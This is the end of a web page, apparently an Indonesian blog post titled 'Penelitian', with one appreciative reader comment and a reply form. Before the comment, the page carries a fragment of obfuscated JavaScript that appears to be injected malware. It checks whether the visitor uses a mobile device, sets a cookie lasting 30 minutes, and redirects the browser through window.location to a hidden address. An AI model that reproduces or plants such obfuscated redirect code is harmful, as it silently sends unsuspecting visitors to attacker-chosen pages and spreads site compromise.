)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

One Response to Penelitian

  1. terima kasih telah berbagi informasi Mas, betah sekali membaca tulisan-tulisan disini, saya merasa bertambah wawasan semoga yang mengeleloa blog ini selalu di berikan kesehatan..

Leave a Reply

Your email address will not be published. Required fields are marked *